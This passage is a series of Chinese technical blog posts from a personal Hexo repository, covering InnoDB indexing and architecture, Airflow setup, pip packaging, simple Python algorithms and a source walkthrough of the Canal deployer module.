"text": "---\ntitle: MySQL-索引概述\ndate: 2018-10-25 11:40:33\ncategories: MySQL\ntags: [MySQL,聚集索引,辅助索引]\n---\n## 前言\n索引是应用程序开发和设计的一个重要的方面。若索引太多,会影响应用程序的性能;若没有索引,对查询性能又有影响。所以,需要找到一个平衡点,这对应用程序设计、开发至关重要。\n\n## InnoDB索引概述\n### 常见的索引分类\n- B+Tree索引\n- 全文索引\n- 哈希索引\n> InnoDB存储引擎支持的哈希索引是自适应的,InnoDB会根据表的使用情况,自动生成Hash索引,不能认为干预。\n\n## B+Tree索引\nB+Tree索引是传统意义上的索引结构,是目前关系型数据库使用的最为常用和有效的索引类型。\n> B+Tree中的B不是二叉(binary),而是代表平衡(balance),因为B+Tree是从平衡二叉树演化过来的,但不是二叉树。\n\nB+Tree索引并不能找到给定键的具体行,只能找到查找数据行所在的页,然后再通过将页读入内存,在内存中查找,最后得到查找的数据。\n\n数据中B+Tree索引分为聚集索引和辅助索引,不管是聚集还是辅助索引,内部都是基于B+Tree的,即高度平衡的,叶子节点存放所有数据。聚集索引和辅助索引的主要区别是叶子节点是否存放一整行数据。\n\n### 聚集索引\n聚集索引就是按表的主键构造一颗B+Tree,叶子节点存放表的行数据。所以,叶子节点也称为数据页。同时每个数据页通过双向链表连接。\n\n聚集索引的存储并不是物理上连续的,而是逻辑上连续的。\n- 一是因为页是通过双向链表链接的,数据页是按主键顺序排序。\n- 二是因为每个数据页中的记录行也是通过双向链表维护的,物理上也可以不按主键顺序存储。\n\nInnoDB引擎的表数据是通过主键索引结构来组织的,叶子节点存放行数据,是一种B+Tree文件组织。\n\n可以快速通过主键定位数据,在创建表时,无论是否有明确的主键,InnoDB都会为表自动创建一个主键索引。\n\n实际使用过程中,当通过主键来查询某些数据时,先通过B+Tree快速定位到叶子节点地址;由于叶子节点是磁盘块(4k)大小的整数倍(4x4=16k,InnoDB的页大小为16k),这样通过连续地址快速I/O将整个页内容加载到内存中,然后在内存中筛选出目标数据。\n\n由于InnoDB的主键索引的存储是按主键的顺序存储的,所以InnoDB的主键索引是聚集索引,并且每张表只允许一个聚集索引;\n\n### 辅助索引\n\n辅助索引的叶子节点并不包含行记录的全部数据,二是包含一个书签,书签就是相应行数据的聚集索引键。因此,还需要通过聚集索引来获取行的全部数据。\n\n除了主键索引以外的索引都称为InnoDB的辅助索引,也称为二级索引。\n\n辅助索引的存储结构也是B+Tree,和主索引不同的是,叶子节点存储的不是行数据,而是主键值,所以,通过辅助索引定位到目标数据后(其实是目标数据的id),还需要通过主键,再通过主索引得到真正的目标数据;\n\n### 哈希索引\n时间复杂度O(1),不只是存在于索引中,几乎每个应用程序都应用到这个数据结构。\n\nInnoDB存储引擎使用哈希算法来对字典进行查找,使用链表方式解决哈希ch\n\n## 全文检索\n\n全文检索使用倒排索引来实现"
},
{
"alpha_fraction": 0.7209466695785522,
"alphanum_fraction": 0.7463793754577637,
"avg_line_length": 28.5,
"blob_id": "eb56bd82161098e0c17427f517f668fec0ce44db",
"content_id": "b3f2464ec664d1a5efbec8bab95f7cb0c60f401a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3623,
"license_type": "no_license",
"max_line_length": 181,
"num_lines": 96,
"path": "/source/_posts/airflow.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: Airflow安装使用\ndate: 2018-06-29 22:31:21\ncategories: 工具\ntags: [airflow,crontab]\n---\n### 介绍\nAirflow 是 Airbnb 使用Python开发的用于工作流管理的开源项目,简单说就是管理和调度定时任务,可以替代Linux的crontab。如果你的crontab很多,不好管理,那么airflow对你来说就是救星。它自带简洁的UI,现在 Apache 下做孵化,地址是https://github.com/apache/incubator-airflow\n\n### 安装\n> 由于airflow是使用Python开发的,所以要安装airflow,需要Python环境,Python2 或者Python3都可以。\n> 最好使用VirtualEnv来安装,因为airflow可能依赖了一些Python库和你的Python环境中的某个库的版本冲突,我就是因为这个搞了差不多一天时间。\n\n安装好Python环境和virtualenv后,开始安装airflow\n```\n# 1)首先创建并进入airflow的工作目录下\n$ cd /path/to/my/airflow/workspace\n$ virtualenv -p `which python3` venv\n$ source venv/bin/activate\n(venv) $ \n# 2)安装airflow\n(venv) $ pip install airflow\n# 3)设置AIRFLOW_HOME\n(venv) $ cd /path/to/my/airflow/workspace\n(venv) $ mkdir airflow_home\n(venv) $ export AIRFLOW_HOME=`pwd`/airflow_home\n# 4)测试airflow\n(venv) $ airflow version\n# 5)初始化airflow数据库,默认airflow使用SQLite,线上环境可以使用mysql\n(venv) $ airflow initdb\n# 6)启动airflow webserver,airflow默认监听8080端口,Web Server启动后,就可以通过IP:Port(8080)访问了。\n(venv) $ airflow webserver\n```\n### 创建DAG\n1)在airflow_home中创建dags目录,目录结构如下:\n```\n(venv) ➜ airflow_home tree\n.\n├── airflow.cfg\n├── airflow.db\n├── airflow-webserver.pid\n├── dags\n│ ├── hello_world.py\n│ └── __pycache__\n│ └── hello_world.cpython-36.pyc\n├── logs\n│ ├── hello_world\n│ │ ├── dummy_task\n```\n2)的dags目录下,创建一个dag,hello_world.py\n```\nfrom datetime import datetime\nfrom airflow import DAG\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.operators.python_operator import PythonOperator\n\ndef print_hello():\n print (\"Hello World...\")\n return 'Hello world!'\n\ndag = DAG('hello_world', description='Simple tutorial DAG',\n schedule_interval='*/1 * * * *',\n start_date=datetime(2018, 6, 29), catchup=False)\n\ndummy_operator = DummyOperator(task_id='dummy_task', retries=3, dag=dag)\n\nhello_operator = PythonOperator(task_id='hello_task', python_callable=print_hello, dag=dag)\n\ndummy_operator >> hello_operator\n```\n### 启动DAG\n```\n(venv) $ airflow scheduler\n```\n\n访问URL【http://ip:8080/admin/】就可以看到上图airflow控制台,里面很多默认的dag,也有我们刚才创建hello_world DAG也在里面,但需要点击红框里的按钮,airflow才会调度dag执行。\n\n### AirFlow相关命令\n```\n# print the list of active DAGs\nairflow list_dags\n# prints the list of tasks the \"tutorial\" dag_id\nairflow list_tasks tutorial\n# prints the hierarchy of tasks in the tutorial DAG\nairflow list_tasks tutorial --tree\n# 以debug模式,deamon方式运行web server\nairflow webserver --debug &\n\n ### 测试DAG\n# testing print_date\nairflow test hello_world hello_task 2018-06-29\n```\n### 参考资料\n[Apache Airflow (incubating) Documentation](https://airflow.incubator.apache.org/index.html)\n[Get started developing workflows with Apache Airflow](http://michal.karzynski.pl/blog/2017/03/19/developing-workflows-with-apache-airflow/)\n[使用 airflow 替代你的 crontab](http://sanyuesha.com/2017/11/13/airflow/)"
},
{
"alpha_fraction": 0.809960663318634,
"alphanum_fraction": 0.8222804665565491,
"avg_line_length": 23.455127716064453,
"blob_id": "672a9d1a7ca71a40d770955e2c62b305e5a772c6",
"content_id": "da25d800afa5e440ac1a5ab9e96b1f5ab1e91b20",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 8313,
"license_type": "no_license",
"max_line_length": 242,
"num_lines": 156,
"path": "/source/_posts/mysql-arch.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: MySQL-概述\ndate: 2018-09-18 17:08:07\ncategories: MySQL\ntags: [MySQL, Undo Log, Redo Log, InnoDB]\n---\n## 数据库与实例\n\n- 数据库是文件集合,依照某种数据模型组织起来并存储于二级存储器中的数据集合\n- 数据库实例是程序,是存在于操作系统和用户之间的数据管理软件。用户对数据库的任何操作都是在数据库实例下进行的,用户程序必须通过数据库实例和数据库交互。\n\n## MySQL存储引擎\n### InnoDB存储引擎\n支持事务,主要设计目标是面向在线事务处理(OLTP)应用。行锁设计,支持外键,并支持非锁定读,支持独立的表ibd文件。从5.5.8开始成为MySQL默认的存储引擎。\n\nInnoDB通过多版本并发控制(MVCC)来提高并发性。并实现了SQL标准的4种隔离级别,默认为RR(Repeatable Read)。\n\n在表的数据存储上,InnoDB采用聚集索引的方式,所以每个表中的数据都是按主键顺序存放的。如果没有显示定义主键,InnoDB会为每行创建一个6字节的row_id作为主键。\n\n### MyISAM存储引擎\n不支持事务、表锁设计,支持全文索引。在MySQL 5.5.8之前是MySQL默认的存储引擎。\n\n## InnoDB存储引擎关键特性\n- 插入缓冲(Insert Buffer)\n- 两次写(Double Write)\n- 自适应哈希索引(Adaptive Hash Index)\n- 异步IO(Async IO)\n- 刷新临近页(Flush Neighbor Page)\n\n### 插入缓冲(Insert Buffer)\n1)主要功能:\n 提高非唯一的辅助索引的插入性能\n \n2)前提条件\n- 辅助索引(或者二级索引)\n- 非唯一索引\n\nMySQL在进行插入操作时,数据页是按聚集索引(主键、主索引)顺序存放的,但对于非聚集的叶子节点(辅助索引的叶子节点存的是主键,查询时需要进行二次查找)的插入,就不是顺序的了,这时就需要离散的访问非聚集索引页,正是由于这样的随机读取的存在,导致了插入性能的下降。\n\n为了解决辅助索引随机读取导致的性能问题,MySQL引入了Insert Buffer的设计,大概的思想是通过使用缓存,将多次对索引页的操作,合并成一次来提供性能。对非聚集索引的插入和更新操作,不会每次都直接插入到索引页中,而是先判断索引页是否在缓存池中,在,就直接插入,不在,则先放到一个Insert Buffer对象中,然后再以一定的频率和情况来对Insert Buffer和辅助索引页子节点的合并,这样,通常可以将多个插入操作合并到一个操作中,这样就大大提高了非聚集索引的插入性能。\n\n### 两次写(Double Write)\n主要功能:提高数据页的可靠性\n\n### 自适应哈希索引(Adaptive Hash Index)\n\n主要功能:提高索引页的检索速度\n\nInnoDB引擎自动优化,无需人工干预\n\n### 异步IO(Async IO)\n\n主要功能:提高磁盘读写性能\n\n合并IO请求,提高IOPS性能。\n\n### 刷新临近页(Flush Neighbor Page)\n\n主要功能:利用AIO,合并IO请求\n\n当刷新一个脏页时,InnoDB存储引擎会该页所在区(extent)的所有页,如果是脏页,则一起进行刷新。\n\n## InnoDB日志\nInnoDB引擎有两个非常重要的日志\n- 一个是undo log,\n- 另外一个是redo log\n\nundo log用来保证事务的原子性以及InnoDB的MVCC,redo log用来保证事务的持久性。\n\n### Undo Log(逻辑日志)\nUndo log一直都是事务、多版本并发控制(MVCC)的核心组件,当我们对数据记录做了修改操作时,就会记录undo log。\n#### 核心功能:\n\n- 事务回滚\n\n 可以认为当delete一行记录时,undo log中记录的是一条对应的insert语句,当执行一条update语句时,undo log中记录的是与其相反的update语句。所以,当执行rollback时,可以从undo log的逻辑记录中获取相应的内容进行回滚。\n \n- 非锁定一致性读(MVCC多行版本控制)\n\n 行多版本控制也是通过undo log来实现的,当读取某一行被某个事务锁定时,可以通过undo log获取行在事务锁定之前的数据,从而提供行版本信息,实现非锁定一致性读取。\n\n 每条undo log也会指向更早版本的undo log,从而形成一条更新链。通过这个更新链,不同事务可以找到其对应版本的undo log,组成old version记录,这条链就是记录的history list。\n\nundo log的也会产生redo log记录行的物理变化\n\n根据提交事务的行为不同,undo log 分为update undo log 和 insert undo log\n- insert undo log\n因为,insert操作只对事务本身可见,所以,insert undo log在事务提交后,就可以直接删除。\n- update undo log\nupdate undo log是update 和 delete操作产生的undo log。\n因为是对已经存在的记录进行操作,并且update undo log还被MVCC使用,所以,当事务提交的时候,不能立刻删除update undo log。而是等待purge线程离线删除。\n\n### redu log(物理日志)\n\n和其他数据库一样,InnoDB记录对数据文件的物理更改,并保证总是日志先行(即WAL)。\n\n#### 作用:数据恢复\nredo log记录的是数据页的物理变化,是保证事务一致性非常重要的手段,InnoDB通过redolog保证已经commit的数据一定不会丢失,也就是事务隔离级别的持久性实现。\n \n#### 跟二进制日志的区别:\n \n1)二进制日志会记录所有跟MySQL有关的日志,包括InnoDB、MyISAM...,而Redo Log只记录存储引擎本身的事务日志\n\n2)记录的内容不同,二进制日志记录的是一个事务的具体操作内容,即是逻辑日志,Redo Log记录的是每个页(page)更改的物理情况。\n\n3)写入时间不同。二进制日志仅在事务提交前进行提交,无论该事务多大,只写磁盘一次;而在事务进行过程中,不断有Redo Log条目写入到Redo Log中。\n\n\n## 索引组织表\n在InnoDB存储引擎中,表都是按主键顺序组织存放的,这种存储方式组织的表称为索引组织表。\n\n在InnoDB存储引擎中,每个表都有一个主键,如果没有显示定义主键,InnoDB会按下面的方式选择或创建主键\n- 如果有非空唯一索引,则选该列为主键\n- 否则,InnoDB会自动创建一个6字节的_rowid作为主键\n\n## InnoDB逻辑存储结构\nInnoDB所有数据都存储在表空间中(tablespace)。表空间又由段(segment)、区(extent)和页(page)组成。\n\n如果用户启用innodb_file_per_talbe,则每张表的数据可以单独放在一个表空间中。\n\n表空间是由段组成的,常见的段有数据段、索引段、回滚段。\n\nInnoDB的表是由索引组织的,所以数据也是索引,索引也是数据。数据段即是B+Tree的叶子节点,索引段即是B+Tree的非叶子节点。对段的管理是由InnoDB引擎自身管理的。\n\nInnoDB的区是由连续的页组成的,在任何情况下区的大小都是1M,默认情况下,InnoDB的页大小为16k,每个区64个页组成。\n\n页是InnoDB存储引擎磁盘管理的最小单位,常见的页类型有:\n- 数据页\n- Undo 页\n- 系统页\n- 插入缓冲位图页\n- 插入缓冲空闲列表页\n\nInnoDB存储引擎是面向行的,每页存放的行记录也是硬性定义的。\nInnoDB行记录格式:\n- Compact (MySQL5.0引入)\n- Redundant (MySQL5.0之前默认)\n- Compressed\n- 
Dynamic\n\nCompressed 和 Dynamic是新的行格式,对于存放Blob类型的数据采用完全溢出的方式,在数据页中只存放20字节的指针,而之前的Compact 和 Redundant会存放768字节的前缀。\n\n### 行溢出数据 \nInnoDB存储引擎可以将一行记录的某些数据存储在数据页之外。一般认为大对象列类型的存储会把数据存储在页之外。\n\nInnoDB存储引擎Verchar类型的最大长度65535(实际上跟字符集有关),这是一行中所有verchar类型的长度总和。\n\n## MySQL分区\n\n### MySQL支持的分区类型\n- Range分区\n- List分区\n- Hash分区\n- Key分区\n\n当表中存在主键或者唯一索引时,分区列必须是唯一索引的一个组成部分。唯一索引是允许NULL值的,并且分区列只需要是唯一索引的一部分,不需要整个唯一索引列都是分区列。\n"
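The write-ahead rule mentioned in the post above ("日志先行", WAL) is easy to state in code: append the physical change to the redo log before touching the page, so that committed changes survive a crash of the buffer pool. This is a toy sketch of the rule only, under simplified assumptions — not InnoDB's actual log format or recovery protocol.

```python
# Toy write-ahead logging: log the physical change first, then modify the
# page, so a lost buffer pool can be rebuilt by replaying the log.
redo_log = []            # append-only; durable in a real engine
pages = {"page1": 0}     # in-memory buffer pool

def update(page, value):
    redo_log.append((page, value))  # 1) write the redo record first
    pages[page] = value             # 2) only then change the page

def recover():
    state = {"page1": 0}            # start from the on-disk baseline
    for page, value in redo_log:    # replay physical changes in order
        state[page] = value
    return state

update("page1", 42)
pages.clear()            # simulate a crash that loses the buffer pool
print(recover())         # {'page1': 42}, redone from the log
```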
},
{
"alpha_fraction": 0.6370967626571655,
"alphanum_fraction": 0.6814516186714172,
"avg_line_length": 14.479166984558105,
"blob_id": "3d9ae9bed08df240a4cb7e039a54f7ff3f8a6d82",
"content_id": "b5d8d24efb3cd36007310b4c1dbae3c5488fb1d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 916,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 48,
"path": "/source/_posts/pip-package.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "title: 'pip安装python环境及打包'\ndate: 2014-06-26 09:37:53\ncategories: Python #文章文类\ntags: [pip,打包,python] #文章标签,多于一项时用这种格式\n---\n### 0.安装虚拟环境\n``` bash\npip install virtualenv\nvirtualenv env1\nsource env1/bin/activate\n```\n\t\n \n### 1. 将包依赖信息保存在requirements.txt文件\n\n``` bash\npip freeze > requirements.txt\n```\n \n### 2.根据依赖文件安装依赖\n\n```bash\npip install -r requirements.txt\n```\n \n### 3.根据依赖文件下载依赖包\n\n```bash\npip install -d /path/to/save/ -r requirements.txt\n```\n \n### 4.pip install -i指定pypi服务器\n\n```bash\npip install -i http://127.0.0.1:8000/ -r requirements.txt\n```\n \n### 5.打/opt/tools/env中所有依赖包到MyEnv.pybundle\n\n```bash\npip bundle MyEnv.pybundle -r pip-requires --no-index -f /opt/tools/env\n```\n \n### 6.使用MyEnv.pybundle安装依赖包\n\n```bash\npip install MyEnv.pybundle\n```\n\n"
},
{
"alpha_fraction": 0.4939349889755249,
"alphanum_fraction": 0.5482775568962097,
"avg_line_length": 19.81818199157715,
"blob_id": "b74daeb8035e0ae502ba10864eed2b89278a7c65",
"content_id": "5a9ec2bc82d1270eadca2ebf22865fdb9a954b09",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2739,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 99,
"path": "/source/_posts/python_calc.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "title: 'Python几个算法实现'\ndate: 2014-07-08 13:02:53\ncategories: 算法 #文章文类\ntags: [算法,冒泡,python] #文章标签,多于一项时用这种格式\n---\n\n### 1.平衡点问题:\n比如int[] numbers = {1,3,5,7,8,25,4,20}; 25前面的总和为24,25后面的总和也是24,25这个点就是平衡点;假如一个数组中的元素,其前面的部分等于后面的部分,那么这个点的位序就是平衡点 \n要求:返回任何一个平衡点\n``` bash\ndef balance_point(li):\n start = 0\n end = len(li)-1\n sum_start = li[start]\n sum_end = li[end]\n while start < end:\n if sum_start == sum_end and end-start == 2:\n return start+1\n if sum_start < sum_end:\n start += 1\n sum_start += li[start]\n else:\n end -= 1\n sum_end += li[end]\n return -1\n```\n\t\n \n### 2.支配点问题: \n支配数:数组中某个元素出现的次数大于数组总数的一半时就成为支配数,其所在位序成为支配点;比如int[] a = {3,3,1,2,3};3为支配数,0,1,4分别为支配点; \n要求:返回任何一个支配点\n\n``` bash\ndef control_point(li):\n count_li = len(li)/2\n for i in li:\n if li.count(i) > count_li:\n return i\n\n return -1\n```\n \n### 3.python冒泡排序\n\n*冒泡*排序是最简单且稳定的排序方式,时间复杂度为O(n*n).下面主要使用Python range()函数控制循环,以及python返回多个值的性质,使得代码很简单\n\n```bash\ndef bubble_sort(li):\n for i in range(len(li)-1, 0, -1):\n for j in range(0,i):\n if li[j] > li[j+1]:\n li[j+1], li[j] = li[j], li[j+1]\n```\n\n### 4.输出1~N之间的素数\n\n**定义**:素数又叫质数[维基百科](http://zh.wikipedia.org/wiki/%E7%B4%A0%E6%95%B0)\n\n```bash\nfrom math import sqrt\n\n\ndef sushu_out(n):\n result = []\n for num in range(2, n):\n flag = True\n for j in range(2, int(sqrt(num))+1):\n if num % j == 0:\n flag = False\n break\n if flag:\n result.append(num)\n print result, len(result)\n```\n\n### 5.删除list中重复元素\n\n- l2 = list(set(l1))\n- l2 = {}.fromkeys(l1).keys()\n\n不改变原来顺序\n\n- l2 = sorted(set(l1),key=l1.index)\n- 遍历\n\n### 6.斐波那契数列\n\n**定义**:[斐波那契数列](http://zh.wikipedia.org/wiki/%E6%96%90%E6%B3%A2%E9%82%A3%E5%A5%91%E6%95%B0%E5%88%97)\n\n```bash\ndef fib(n):\n ret = []\n a = 0\n b = 1\n for i in range(0, n):\n ret.append(b) # 主意此处不能使用ret[i] = b ,会导致数组越界,因为ret现在为空,Java中数组初始化要给定长度,Python不同。\n a, b = b, a+b\n return ret\n```\n"
},
{
"alpha_fraction": 0.584617555141449,
"alphanum_fraction": 0.5871741771697998,
"avg_line_length": 38.667606353759766,
"blob_id": "11163badd0216446bbf20dc447c9659e8be6de58",
"content_id": "4aa442466001008c66f660698802ee8b40d243b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 15681,
"license_type": "no_license",
"max_line_length": 179,
"num_lines": 355,
"path": "/source/_posts/canal02.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: Canal系列02-Deployer模块\ndate: 2019-06-16 22:10:32\ncategories: Canal系列\ntags: [canal]\n---\n## 一、简介\n通过deployer模块,我们可以直接使用maven打出一个Canal可执行包,项目结构包括:\n\n- bin项目启动/停止/初始化脚本\n- conf项目配置文件\n- lib项目依赖jar\n- logs项目执行的日志目录\n\n## 二、源码分析\n\n- 1)Canal启动的类是CanalLauncher,通过解析配置文件,调用CanalStater.start(properties),这里CanalStater->CanalStarter,感觉可能是类名弄错了,这个类不复杂。\n- 2)CanalStater首先会判断是否是使用MQ来接收binlog的,Canal支持将binlog直接发送的kafka或者RocketMQ中。然后启动CanalController这个类的start方法。\n- 3)CanalController这个是比较复杂的类,里面包括Canal实例及嵌入式服务的启动,我在代码里加了注释方便理解。\n\n```\n// 构造方法很长\npublic CanalController(final Properties properties){\n managerClients = MigrateMap.makeComputingMap(new Function<String, CanalConfigClient>() {\n\n public CanalConfigClient apply(String managerAddress) {\n return getManagerClient(managerAddress);\n }\n });\n\n // 初始化全局参数设置,重要:instanceGenerator声明CanalInstanceGenerator如何生成\n // Spring模式下,通过配置default-instance.xml,实现CanalInstanceWithSpring的组装\n globalInstanceConfig = initGlobalConfig(properties);\n instanceConfigs = new MapMaker().makeMap();\n // 初始化instance config,将配置初始化到instanceConfigs中\n initInstanceConfig(properties);\n\n // init socketChannel\n String socketChannel = getProperty(properties, CanalConstants.CANAL_SOCKETCHANNEL);\n if (StringUtils.isNotEmpty(socketChannel)) {\n System.setProperty(CanalConstants.CANAL_SOCKETCHANNEL, socketChannel);\n }\n\n // 兼容1.1.0版本的ak/sk参数名\n String accesskey = getProperty(properties, \"canal.instance.rds.accesskey\");\n String secretkey = getProperty(properties, \"canal.instance.rds.secretkey\");\n if (StringUtils.isNotEmpty(accesskey)) {\n System.setProperty(CanalConstants.CANAL_ALIYUN_ACCESSKEY, accesskey);\n }\n if (StringUtils.isNotEmpty(secretkey)) {\n System.setProperty(CanalConstants.CANAL_ALIYUN_SECRETKEY, secretkey);\n }\n\n // 准备canal server\n cid = Long.valueOf(getProperty(properties, CanalConstants.CANAL_ID));\n ip = getProperty(properties, CanalConstants.CANAL_IP);\n port = Integer.valueOf(getProperty(properties, CanalConstants.CANAL_PORT));\n embededCanalServer = CanalServerWithEmbedded.instance();\n // 设置自定义的instanceGenerator,这里比较重要\n embededCanalServer.setCanalInstanceGenerator(instanceGenerator);\n try {\n int metricsPort = Integer.valueOf(getProperty(properties, CanalConstants.CANAL_METRICS_PULL_PORT));\n embededCanalServer.setMetricsPort(metricsPort);\n } catch (NumberFormatException e) {\n logger.info(\"No valid metrics server port found, use default 11112.\");\n embededCanalServer.setMetricsPort(11112);\n }\n // 使用Netty创建Http Server,用来接收Canal 客户端的请求\n String canalWithoutNetty = getProperty(properties, CanalConstants.CANAL_WITHOUT_NETTY);\n if (canalWithoutNetty == null || \"false\".equals(canalWithoutNetty)) {\n canalServer = CanalServerWithNetty.instance();\n canalServer.setIp(ip);\n canalServer.setPort(port);\n }\n\n // 处理下ip为空,默认使用hostIp暴露到zk中\n if (StringUtils.isEmpty(ip)) {\n ip = AddressUtils.getHostIp();\n }\n final String zkServers = getProperty(properties, CanalConstants.CANAL_ZKSERVERS);\n if (StringUtils.isNotEmpty(zkServers)) {\n // HA 模式下初始化ZK相关节点\n zkclientx = ZkClientx.getZkClient(zkServers);\n // 初始化系统目录\n zkclientx.createPersistent(ZookeeperPathUtils.DESTINATION_ROOT_NODE, true);\n zkclientx.createPersistent(ZookeeperPathUtils.CANAL_CLUSTER_ROOT_NODE, true);\n }\n\n final ServerRunningData serverData = new ServerRunningData(cid, ip + \":\" + port);\n ServerRunningMonitors.setServerData(serverData);\n // 通过ServerRunningMonitors注册destination实例的ServerRunningMonitor,通过ServerRunningListener启动\n // 
每个destination的嵌入式服务embededCanalServer\n ServerRunningMonitors\n .setRunningMonitors(MigrateMap.makeComputingMap(new Function<String, ServerRunningMonitor>() {\n\n public ServerRunningMonitor apply(final String destination) {\n ServerRunningMonitor runningMonitor = new ServerRunningMonitor(serverData);\n runningMonitor.setDestination(destination);\n runningMonitor.setListener(new ServerRunningListener() {\n\n public void processActiveEnter() {\n try {\n MDC.put(CanalConstants.MDC_DESTINATION, String.valueOf(destination));\n embededCanalServer.start(destination);\n if (canalMQStarter != null) {\n canalMQStarter.startDestination(destination);\n }\n } finally {\n MDC.remove(CanalConstants.MDC_DESTINATION);\n }\n }\n\n public void processActiveExit() {\n try {\n MDC.put(CanalConstants.MDC_DESTINATION, String.valueOf(destination));\n if (canalMQStarter != null) {\n canalMQStarter.stopDestination(destination);\n }\n embededCanalServer.stop(destination);\n } finally {\n MDC.remove(CanalConstants.MDC_DESTINATION);\n }\n }\n\n public void processStart() {\n try {\n if (zkclientx != null) {\n final String path = ZookeeperPathUtils.getDestinationClusterNode(destination,\n ip + \":\" + port);\n initCid(path);\n zkclientx.subscribeStateChanges(new IZkStateListener() {\n\n public void handleStateChanged(KeeperState state) throws Exception {\n\n }\n\n public void handleNewSession() throws Exception {\n initCid(path);\n }\n\n @Override\n public void handleSessionEstablishmentError(Throwable error) throws Exception {\n logger.error(\"failed to connect to zookeeper\", error);\n }\n });\n }\n } finally {\n MDC.remove(CanalConstants.MDC_DESTINATION);\n }\n }\n\n public void processStop() {\n try {\n MDC.put(CanalConstants.MDC_DESTINATION, String.valueOf(destination));\n if (zkclientx != null) {\n final String path = ZookeeperPathUtils.getDestinationClusterNode(destination,\n ip + \":\" + port);\n releaseCid(path);\n }\n } finally {\n MDC.remove(CanalConstants.MDC_DESTINATION);\n }\n }\n\n });\n if (zkclientx != null) {\n runningMonitor.setZkClient(zkclientx);\n }\n // 触发创建一下cid节点\n runningMonitor.init();\n return runningMonitor;\n }\n }));\n\n // 初始化monitor机制\n autoScan = BooleanUtils.toBoolean(getProperty(properties, CanalConstants.CANAL_AUTO_SCAN));\n if (autoScan) {\n // InstanceAction完成自动扫描配置有变更时,对实例上的嵌入式服务embededCanalServer通过ServerRunningMonitor进行重启\n defaultAction = new InstanceAction() {\n\n public void start(String destination) {\n InstanceConfig config = instanceConfigs.get(destination);\n if (config == null) {\n // 重新读取一下instance config\n config = parseInstanceConfig(properties, destination);\n instanceConfigs.put(destination, config);\n }\n\n if (!embededCanalServer.isStart(destination)) {\n // HA机制启动\n ServerRunningMonitor runningMonitor = ServerRunningMonitors.getRunningMonitor(destination);\n if (!config.getLazy() && !runningMonitor.isStart()) {\n runningMonitor.start();\n }\n }\n }\n\n public void stop(String destination) {\n // 此处的stop,代表强制退出,非HA机制,所以需要退出HA的monitor和配置信息\n InstanceConfig config = instanceConfigs.remove(destination);\n if (config != null) {\n embededCanalServer.stop(destination);\n ServerRunningMonitor runningMonitor = ServerRunningMonitors.getRunningMonitor(destination);\n if (runningMonitor.isStart()) {\n runningMonitor.stop();\n }\n }\n }\n\n public void reload(String destination) {\n // 目前任何配置变化,直接重启,简单处理\n stop(destination);\n start(destination);\n }\n };\n // 主要是对spring模式的配置进行监控,单独启动线程每scanInterval扫描一次,\n // 通过上面的defaultAction对嵌入式的embededCanalServer进行重启\n 
instanceConfigMonitors = MigrateMap.makeComputingMap(new Function<InstanceMode, InstanceConfigMonitor>() {\n\n public InstanceConfigMonitor apply(InstanceMode mode) {\n int scanInterval = Integer\n .valueOf(getProperty(properties, CanalConstants.CANAL_AUTO_SCAN_INTERVAL));\n\n if (mode.isSpring()) {\n SpringInstanceConfigMonitor monitor = new SpringInstanceConfigMonitor();\n monitor.setScanIntervalInSecond(scanInterval);\n monitor.setDefaultAction(defaultAction);\n // 设置conf目录,默认是user.dir + conf目录组成\n String rootDir = getProperty(properties, CanalConstants.CANAL_CONF_DIR);\n if (StringUtils.isEmpty(rootDir)) {\n rootDir = \"../conf\";\n }\n\n if (StringUtils.equals(\"otter-canal\", System.getProperty(\"appName\"))) {\n monitor.setRootConf(rootDir);\n } else {\n // eclipse debug模式\n monitor.setRootConf(\"src/main/resources/\");\n }\n return monitor;\n } else if (mode.isManager()) {\n return new ManagerInstanceConfigMonitor();\n } else {\n throw new UnsupportedOperationException(\"unknow mode :\" + mode + \" for monitor\");\n }\n }\n });\n }\n}\n```\n\n接着调用start方法:\n\n```\npublic void start() throws Throwable {\n logger.info(\"## start the canal server[{}:{}]\", ip, port);\n // 创建整个canal的工作节点\n final String path = ZookeeperPathUtils.getCanalClusterNode(ip + \":\" + port);\n // ZK相关初始化\n initCid(path);\n if (zkclientx != null) {\n this.zkclientx.subscribeStateChanges(new IZkStateListener() {\n\n public void handleStateChanged(KeeperState state) throws Exception {\n\n }\n\n public void handleNewSession() throws Exception {\n initCid(path);\n }\n\n @Override\n public void handleSessionEstablishmentError(Throwable error) throws Exception {\n logger.error(\"failed to connect to zookeeper\", error);\n }\n });\n }\n // 优先启动embeded服务,主要注册canalInstances,使用canalInstanceGenerator.generate(destination)\n embededCanalServer.start();\n // 尝试启动一下非lazy状态的通道\n for (Map.Entry<String, InstanceConfig> entry : instanceConfigs.entrySet()) {\n final String destination = entry.getKey();\n InstanceConfig config = entry.getValue();\n // 创建destination的工作节点\n if (!embededCanalServer.isStart(destination)) {\n // HA机制启动\n // 使用构造函数中注册的runningMonitor的listener启动实例上的embededCanalServer服务\n ServerRunningMonitor runningMonitor = ServerRunningMonitors.getRunningMonitor(destination);\n if (!config.getLazy() && !runningMonitor.isStart()) {\n runningMonitor.start();\n }\n }\n\n if (autoScan) {\n instanceConfigMonitors.get(config.getMode()).register(destination, defaultAction);\n }\n }\n\n if (autoScan) {\n // 自动扫描配置,启动线程扫描配置目录,有改动就重启嵌入式实例服务\n instanceConfigMonitors.get(globalInstanceConfig.getMode()).start();\n for (InstanceConfigMonitor monitor : instanceConfigMonitors.values()) {\n if (!monitor.isStart()) {\n monitor.start();\n }\n }\n }\n\n // 启动网络接口\n if (canalServer != null) {\n canalServer.start();\n }\n}\n```\n\n## 